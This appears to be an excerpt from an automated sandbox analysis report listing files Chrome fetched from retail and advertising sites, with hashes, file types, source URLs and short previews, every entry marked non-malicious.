                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................^n..?Q..D.....{..'7o7.n.2.c..t.....<..V...U..up.[......"..o.\-....a.VB8....h.....V.s"d/.\-yh...F......p....0E.. .B..h.>..0D.h5..up..g
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):36
                                                                                                                                                                                    Entropy (8bit):3.0708241287951763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:M3VllRCXk6pswn:ElakCsw
                                                                                                                                                                                    MD5:F729966732570537B1F59424F6F06755
                                                                                                                                                                                    SHA1:EEA047C3C30C3C5AFF350D10B0EBE35802C56528
                                                                                                                                                                                    SHA-256:130B6263E0272B64DB46C42CB3DA57F47CED7317289CE3B0658A5568178CD5EC
                                                                                                                                                                                    SHA-512:A0321512172336B4E759801AFE99AE30BFB278458BBE2E8BD13D8E168962C055FA48E1FA255C7AFD0CC88DD61B564B57B5240F76EF70CE99C22C3B2F2615289F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.bedbathandbeyond.com/dlp?cci=FJPCB3QZ55B3SY2PLDXUPTXKCY
                                                                                                                                                                                    Preview:GIF87a.............,...........L..;.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2055
                                                                                                                                                                                    Entropy (8bit):6.814579913360174
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxwOamhm2sd8cfnoKnsk9TLKE1:NBIl/XrxwOphml+cDBb
                                                                                                                                                                                    MD5:703368A5F7A44593B8A0DD694056060A
                                                                                                                                                                                    SHA1:D63D423566CF58D4FA8D25D0D965649CF60875CF
                                                                                                                                                                                    SHA-256:2F07FC3F157613E4966AA2BC0E2E1A4602FA621805215B25CBDD2FA7CE744759
                                                                                                                                                                                    SHA-512:39732E6FD99FB69A8DD5B7CDEB3716A9BCEC692E6F9DF2935205F573C51A984EAA9B6A0EC3845E77C2F130637363CD27AE1E59D29F0DBC3D1E364DED8DC62666
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.......................................................................................c.}G....O...7..:s.g..3O....:.y..F^y..>.....S^m,.i.z.q.o...f...s.+*.0S..N..I......978..<..3...k.....8..Y...........?...A...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):4.270340411085111
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YPk7waifM8OETAk5waifMN:YYwpM8O6B5wpMN
                                                                                                                                                                                    MD5:6A59206692CE3585653B3232CAC4A50C
                                                                                                                                                                                    SHA1:DFF30E7CC4801BAFA10BC1D777E2CFA20C3C79F6
                                                                                                                                                                                    SHA-256:AA68B21018C7D67F9370ECB380065765E1CE2292EA14C46FD3CDA4E551F80835
                                                                                                                                                                                    SHA-512:D25452939C06D26A29FE39E4BF8ACAECB8684D88D8F5C740C7F222C921F36BCF3EBF0895565E9EC23BA19930A6171412006B555324F5581806E65775EA08C51C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://f.creativecdn.com/.well-known/interest-group/permissions/?origin=https%3A%2F%2Fus.creativecdn.com
                                                                                                                                                                                    Preview:{"joinAdInterestGroup": true,. "leaveAdInterestGroup": true}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                    Entropy (8bit):4.620384179512718
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnB2pZSccOfSVJoM2JaJXr364aJEizQVQsLVn:YWtIkW/fAnB2iccOaVJoM2J+r5HLVn
                                                                                                                                                                                    MD5:9A86BDEB11DA731A36A628FB414FE141
                                                                                                                                                                                    SHA1:87B1C77B175C84FE567030F8301976AFB366EC53
                                                                                                                                                                                    SHA-256:C9B8D9A07ED9C2345FFE3925E55244ABACC0DEF39D4EA750796EA8E287C4BE44
                                                                                                                                                                                    SHA-512:A93ADB8526E7E82C33BBC1EAE674D14067E7311352F265B8687F11D1761D8C63688C39279473F24F160EDB4AC71CCCAAA2FC209A18B2408B051760F8A4D7071F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"39128581","rollup":{"average_rating":1.0,"rating_count":1,"review_count":1,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3371), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3371
                                                                                                                                                                                    Entropy (8bit):5.288162473384043
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:oxPUxwzsDgDOaaiKjdBV1kVTH6W/DtGtC8CGjRo90:oxPUNghahjH4pGtZCGFu0
                                                                                                                                                                                    MD5:0CA786600986C60B6BA47251C34AE71B
                                                                                                                                                                                    SHA1:5B6AE58C92D9718E4D3405547C1FDC740D01DDBD
                                                                                                                                                                                    SHA-256:217269DB30DF78BA2610A0D82E2A65F0AF1D857846D7C0A361BC370778B4578F
                                                                                                                                                                                    SHA-512:681BE12126B75E279E01D37851FBFC75E08CCE83BDC0C38E550A4F3D290D3AB64C4AD83117F3A34AE029AD53B950EE8D5F08DD66042E20C592D6C2B6A68DE770
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r](u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u){if(!r){var i=1/0;for(d=0;d<e.length;d++){r=e[d][0],o=e[d][1],u=e[d][2];for(var c=!0,a=0;a<r.length;a++)(!1&u||i>=u)&&Object.keys(n.O).every((function(e){return n.O[e](r[a])}))?r.splice(a--,1):(c=!1,u<i&&(i=u));if(c){e.splice(d--,1);var f=o();void 0!==f&&(t=f)}}return t}u=u||0;for(var d=e.length;d>0&&e[d-1][2]>u;d--)e[d]=e[d-1];e[d]=[r,o,u]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},n.d=function(e,t){for(var r in t)n.o(t,r)&&!n.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},n.f={},n.e=function(e){return Promise.all(Object.keys(n.f).reduce((function(t,r){return n.f[r](e,t),t}),[]))},n.u=function(e){return"static/chunks/"+e+"."+{651:"8aaebbbff3fb4a6d",741:"5c49c5ccb4a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                    Entropy (8bit):2.7773627950641693
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                    MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                    SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                    SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                    SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=14698185;type=overs0;cat=colle0;ord=3891952609080;npa=0;auiddc=164462539.1730294546;u1=Furniture;ps=1;pcor=2042605777;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fcollections%2Ffurniture?
                                                                                                                                                                                    Preview:<html></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1708
                                                                                                                                                                                    Entropy (8bit):6.413637255445593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYfNlBB9njlRd3Rh3b4qQ0mI0kPOSMMIt+EjN63L8WqiJ:NBIl/XflVxENvZHBZb4X3ICN3N6b8WL
                                                                                                                                                                                    MD5:1C90A9264D2E5A496DDCCA662BF6BFC3
                                                                                                                                                                                    SHA1:2286FB64B4D7B407090308F3BE3CE5706CA13143
                                                                                                                                                                                    SHA-256:3BEE0EDB50E28069792E4A606F5B09708F5603135BF05DCD7BBB97AE57FC5325
                                                                                                                                                                                    SHA-512:37D6E199C59EFED624F1369D4953154C7840871D19599A2C5E2F3FCD75F8656F467750B021D528AB510BB1677D0B233BF2E1006A99F23FE57556DAB35B023F09
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...............................................................................,...........".Yv+/..jY.f...p.bF.l......s...*&.P..<I..5..`...*..5d...............9..........................!1.A..Qq"3@a..........&6RVbs...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):57401
                                                                                                                                                                                    Entropy (8bit):3.849501778049542
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:Tz1dx3JP83AdpTZSLz1dx3JP83AdpTZSbZVwQTn5R1GGxi/VlbVTDnnoxp3xpVlA:m0i5Ho7nVR0fB
                                                                                                                                                                                    MD5:B7839CFC6C6723F2726DF12E6A5FF8F5
                                                                                                                                                                                    SHA1:2B00EC7336BD4B40264001E222730905E1B93AE1
                                                                                                                                                                                    SHA-256:0770FEAB9342501427C8F8579C2DC3EDB606B54EB3DF04446AD518E969EB391A
                                                                                                                                                                                    SHA-512:2A52979660CEB16F258681C22E6FC770588555B4162E9BDB86E863EEEFA3915CF3C81B8E48CA2AD2A8AC003B5F471ED7C17E2614459C51B979F532681D79C5A0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10072024-MOPS-HP-1400x150_InfoBanner_Desktop.svg?imwidth=1920
                                                                                                                                                                                    Preview:<svg width="1400" height="150" viewBox="0 0 1400 150" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_34_1764)">.<rect x="1054" y="47" width="188" height="56" rx="4" fill="#0079D2"/>.<path d="M1103.35 71.38C1103.22 70.148 1102.77 69.26 1102 68.716C1101.25 68.156 1100.28 67.876 1099.1 67.876C1098.62 67.876 1098.15 67.924 1097.68 68.02C1097.22 68.116 1096.8 68.276 1096.43 68.5C1096.08 68.724 1095.79 69.028 1095.57 69.412C1095.36 69.78 1095.26 70.244 1095.26 70.804C1095.26 71.332 1095.41 71.764 1095.71 72.1C1096.03 72.42 1096.45 72.684 1096.96 72.892C1097.49 73.1 1098.08 73.276 1098.74 73.42C1099.39 73.548 1100.06 73.692 1100.73 73.852C1101.42 74.012 1102.09 74.204 1102.75 74.428C1103.4 74.636 1103.99 74.924 1104.5 75.292C1105.03 75.66 1105.44 76.124 1105.75 76.684C1106.07 77.244 1106.23 77.948 1106.23 78.796C1106.23 79.708 1106.02 80.492 1105.6 81.148C1105.2 81.788 1104.68 82.316 1104.04 82.732C1103.4 83.132 1102.68 83.42 1101.88 83.596C1101.1 83.788 1100.31 83.8
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5403)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5515
                                                                                                                                                                                    Entropy (8bit):4.9738836927027466
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:ordyK1NCvKpxkaSLuSsj5Gm9K6ly0beamiYcQ9Y56skORuX0HrAM8rDQ/+IN8xN8:KfoxuSsj5GmRza5q05dXGrODQ/+rJ8
                                                                                                                                                                                    MD5:6785D887E5244474D9A1EEA82F45D549
                                                                                                                                                                                    SHA1:5FA718B5837473CFEE86A06E5B3D92DD9E71FDA0
                                                                                                                                                                                    SHA-256:C057213523E2F6A99CE8DE838F1D9FBF3A1AEE46308FAC3EEE7B885CED66B264
                                                                                                                                                                                    SHA-512:9CF2B79F86A8199C1E1F984F8CF420B0587562F57AC3AE25868860EA2C9E61A7DF60AE2843A8D7A24BA85A55B44A5D1B7698C341976A0EA2F0F2DCBC9020F8C2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/component-card-overlay.css?v=140449735698214635831730157903
                                                                                                                                                                                    Preview:.card-overlay{border-radius:2px;height:0;padding-bottom:100%;position:relative;color:var(--color-base-white);display:block;overflow:hidden}.card-overlay:before{content:"";position:absolute;top:0;left:2rem;z-index:2;height:5px;width:42px;background:rgb(var(--color-accent-2))}.card-overlay:after{content:"";pointer-events:none;top:0;left:0;position:absolute;width:100%;height:100%;border-radius:2px}.settings-remove-ribbons-true .card-overlay:before{display:none}.collection .card-overlay{height:100%;padding-bottom:100%}.card-overlay.card-overlay-off:before,.card-overlay.card-overlay-off:after{content:none}@media (max-width: 749px){.product-grid .card-overlay,.product-grid .card-overlay .card-overlay-media{border-radius:0}}@media (min-width: 990px){.card-overlay:before{left:min(10%,3rem)}}@media (min-width: 750px){.grid-1-col-desktop .card-overlay{padding-bottom:48.5%}}@media (min-width: 750px){.grid-1-col-desktop .card-overlay{padding-bottom:38.5%}}@media (min-width: 1200px){.grid-1-col-des
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2007)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2008
                                                                                                                                                                                    Entropy (8bit):5.314246314994638
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:Jm27Lgfe43P/mrkK9Q/P5/wzmJsr2EqfIALAYc62IN81xzXMCHTSCHy1rSHzHu:Jm2Am43P/mYK8P1m3y1j2KwxzbhawzHu
                                                                                                                                                                                    MD5:CD5BAF4E5501957D38FCAD8B67181732
                                                                                                                                                                                    SHA1:65584D5F1A39FCEA9696377D917C1639C239F11C
                                                                                                                                                                                    SHA-256:E0D53C45965E0E1BD05A41AF2EB7C89E50DF3B07EC5E3E101572D737A302EF43
                                                                                                                                                                                    SHA-512:03CC7FBD553E9AA3AE10862A848CF46E8618F929BD256619E45CEBACC2708C4F0B668BF651279AACD11873F2A962865D0EAB0D249925C57E5543E40324D52712
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm/strict/app/web-pixel-401408159@cd5baf4e5501957d38fcad8b67181732.js
                                                                                                                                                                                    Preview:(()=>{var R=Object.create;var I=Object.defineProperty;var S=Object.getOwnPropertyDescriptor;var x=Object.getOwnPropertyNames;var y=Object.getPrototypeOf,C=Object.prototype.hasOwnProperty;var l=(e,c)=>()=>(e&&(c=e(e=0)),c);var b=(e,c)=>()=>(c||e((c={exports:{}}).exports,c),c.exports);var A=(e,c,a,i)=>{if(c&&typeof c=="object"||typeof c=="function")for(let r of x(c))!C.call(e,r)&&r!==a&&I(e,r,{get:()=>c[r],enumerable:!(i=S(c,r))||i.enumerable});return e};var L=(e,c,a)=>(a=e!=null?R(y(e)):{},A(c||!e||!e.__esModule?I(a,"default",{value:e,enumerable:!0}):a,e));var m=(e,c,a)=>new Promise((i,r)=>{var s=t=>{try{n(a.next(t))}catch(h){r(h)}},o=t=>{try{n(a.throw(t))}catch(h){r(h)}},n=t=>t.done?i(t.value):Promise.resolve(t.value).then(s,o);n((a=a.apply(e,c)).next())});var u,_=l(()=>{u="WebPixel::Render"});var k,g=l(()=>{_();k=e=>shopify.extend(u,e)});var T=l(()=>{g()});var O=l(()=>{T()});var N=b(f=>{"use strict";O();var w=/(clickref)=([0-9A-Za-z]+)/,d="_pz_clickref",P=5e3,p=e=>m(f,null,function*()
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):121
                                                                                                                                                                                    Entropy (8bit):4.5666837466907895
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnBIV5Sc3RZJbZ2k64bKGQVQsLVn:YWtIkW/fAnBoQchZJbsMbKpLVn
                                                                                                                                                                                    MD5:A06C16F404975AB2DC0CB003AD548366
                                                                                                                                                                                    SHA1:86E7974FD77ADDD4D32A3F59875051F25A3A45F9
                                                                                                                                                                                    SHA-256:E14B55193DAC7F11C857F6BF26AB5B70AB84A409192E448034B3004EFC9B7698
                                                                                                                                                                                    SHA-512:F7A74FB3E887F1F006D5EE049230D11935A809F3D92EA3A0A86724A1C49BD71ACA194963C4356CA66C547DFB167E22041F39118F91579ACFF80C77A720F33D7A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"37920301","rollup":{"rating_count":0,"review_count":0,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):133
                                                                                                                                                                                    Entropy (8bit):5.202262395749922
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:6OwArfNdaFnVx6IUARCRu0NArfmHtnN0fmUQVVGbXeMvdn:6TALNdaFnViARCgSAL+NmNuMVn
                                                                                                                                                                                    MD5:D6D92AF15B86A7862B72EF9488670940
                                                                                                                                                                                    SHA1:7DD674288B0F2282C2E8F0FE0D5C370527350032
                                                                                                                                                                                    SHA-256:A66D53C24BD05E9DBCFB5AE420A74FB01EAB8316CBD85C1C210533EFCB223AB1
                                                                                                                                                                                    SHA-512:FB1E39224932FAD38C3E23061211FC9B64F7BE54054EBCE6595A589CC16863E2721A245911455FF8F49145D0B1F40BEE4654CB08764B496F4C5E7E9C3554B91D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/RageClickCapture.DnkQ4tsk.css
                                                                                                                                                                                    Preview:.RTmkG{width:190px}@media screen and (max-width: 750px){.RTmkG{width:100%}}.U4CmB{width:100%}.E4OHT{opacity:50%}.hLtvr{display:none}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61991)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):62896
                                                                                                                                                                                    Entropy (8bit):5.53505091417112
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:hb22jlveiRbFUZRAYLqcSoTQpcL7ezvGeqOUIuzQP7j5Pf5P5Ccu0RI525uhLFiB:H1SkBQwueqNIu4xP8UifnLuqYkI7W+
                                                                                                                                                                                    MD5:DC00250CFCB878EC25D3A1B746D436D6
                                                                                                                                                                                    SHA1:862F622E0802E5F56C46A59FFDEAF7DA0BF51D57
                                                                                                                                                                                    SHA-256:D13C08C5D5F8CC0FF60F7E0820B5622E4310019A23210CABAB220B0F3312C4DA
                                                                                                                                                                                    SHA-512:CAE8C0245B7A7728678F93F067F118406E1196A9C60773AF98965805EA0F7C8FE859ADC4A7CDF4E4368B32E5FD936D5595BAA03CA62FA8B1F612D9C82834729C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/DeliveryMethodSelectorSection.HuQ_vE9w.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-ShopPayVerificationSwitch.BlUYB-_q.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","publishMessage.CX0yXme-.js","useUnauthenticatedErrorModal.AwvSMfsF.js","index.BImg1G4g.js","LegacyVaultedShippingMethods.CLlWtWZU.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","MarketsProDisclaimer.D4Dihv-c.js","ShopPayLogo.MmDQrsit.js","assets/ShopPayLogo.D_HPU8Dh.css","index.2zVq00Bx.js","PickupPointCarrierLogo.Dit2gzD9.js","assets/PickupPointCarrierLogo.C0wRU6wV.css","hooks.CJ9fMJ3B.js","assets/ShopPayVerificationSwitch.DVQdwG9J.css","component-GooglePayButton.C5e6CBnC.js","useGooglePaySdk.VumOquMs.js","assets/GooglePayButton.C9QQ9NQG.css","component-FacebookPayButton.fVrCKwgB.js","assets/FacebookPayButton.CTYBjZ8U.css"])))=>i.map(i=>d[i]);.import{m as ee,at as U,c0 as ce,e as L,Z as Oe,cx as Ve,cB as on,T as H,c as ue,aO as Q,ji as en,j
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):69642
                                                                                                                                                                                    Entropy (8bit):5.334305812952832
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicxaQ:RIT7Vs9ZVKBYj8wKcHxaQ
                                                                                                                                                                                    MD5:754433E51375DDE6A59193B79BD06871
                                                                                                                                                                                    SHA1:43F10CE5D1703F38F7182B9D657E20FD136F8C86
                                                                                                                                                                                    SHA-256:80EBE181716FB558B4A9C3A202FA2CC6F0DAD4A06160560A21473D423C9A3A27
                                                                                                                                                                                    SHA-512:BBCC6DADCF84B656CE502F8EBD36DA052C634C8327E11925EDE3D6D50F484BA5A5A221CBD6AF87561EAC9E6BA868163D5D57DE6746EA243D1C06E18B8A3C5BA8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2539
                                                                                                                                                                                    Entropy (8bit):7.154509428394708
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxR2YeGrkmWRQu8n6ZKTzY3zHrpQw9iWe0yO:NBIl/XrxRNeGrrWqu868GWwQXLO
                                                                                                                                                                                    MD5:3BBD8F67E4989142029F60F08CEFF7A0
                                                                                                                                                                                    SHA1:3CB91E8AB5B0B88F61198323DD938CE4B8154E41
                                                                                                                                                                                    SHA-256:39ECC642F2E34529CF57E8A0923B3AF07DE56B0AD5E43AB0674A09A39BFBB4D4
                                                                                                                                                                                    SHA-512:3EE625B419FEF35BFCFC75DE28BA270296DEB0D43157CDD1132E3809B0B975909CFC50C26BA39F41B7037CDF145539A6A09E236045552F5CFF4C572A17201AD9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
